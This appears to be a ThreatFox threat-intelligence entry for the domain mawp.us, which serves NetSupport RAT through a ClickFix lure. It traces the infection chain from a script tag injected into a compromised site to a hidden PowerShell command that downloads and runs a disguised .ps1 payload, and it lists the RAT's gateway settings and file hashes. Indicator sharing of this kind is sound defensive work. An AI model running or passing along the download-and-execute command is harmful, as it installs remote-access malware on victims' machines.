ThreatFox IOC Database
You are viewing the ThreatFox database entry for domain mawp.us.
Database Entry
| IOC ID: | 1624269 |
|---|---|
| IOC: | mawp.us |
| IOC Type: | domain |
| Threat Type: | payload_delivery |
| Malware: | NetSupportManager RAT |
| Malware alias: | NetSupport |
| Confidence Level: | Confidence level is high (100%) |
| Is compromised?: | False |
| ASN: | AS209242 CLOUDFLARESPECTRUM |
| Country: | US |
| First seen: | 2025-10-22 05:48:55 UTC |
| Last seen: | never |
| UUID: | 4851e6bc-aea8-11f0-894e-42010aa4000a |
| Reporter: | |
| Reward: | 5 credits from ThreatFox |
| Tags: | ClickFix NetSupport |
rmceoin
(compromised)->
INJECTED:
<script src="hXXps://static-hotjar[.]com/hotjar-3188784.js"></script>
->
hXXps://static-hotjar[.]com/hotjar-3188784.js
(check for wallet extension)
->
hXXps://hollywoodquarterly[.]com/remote.html
(ClickFix)
->
powershell -w h -nop -c "$a=Join-Path $env:APPDATA 't0g9\\96djli[.]ps1';md (Split-Path $a) -ea 0;$u='hXXps://mawp[.]us/U3A.wav';iwr $u -o $a;& powershell -w h -ep Bypass -f $a"
->
hXXps://mawp[.]us/U3A.wav
(saved as 96djli[.]ps1)
->
NetSupport RAT
GatewayAddress=109[.]107.175.17:443
SecondaryGateway=utahlvs[.]com:443
licensee=KAKAN
serial_no=NSM789508
37d1d033e19cf9dc7313846d9d4026b03d2f822efccd963e5697e9633a4df0d0 mawp[.]us/U3A.wav (US/CA)
de98ed4d3d7cd36e024184d4dca30760b0da99831671f1593f41c1f3d62b32f7 mawp[.]us/M33.wav
US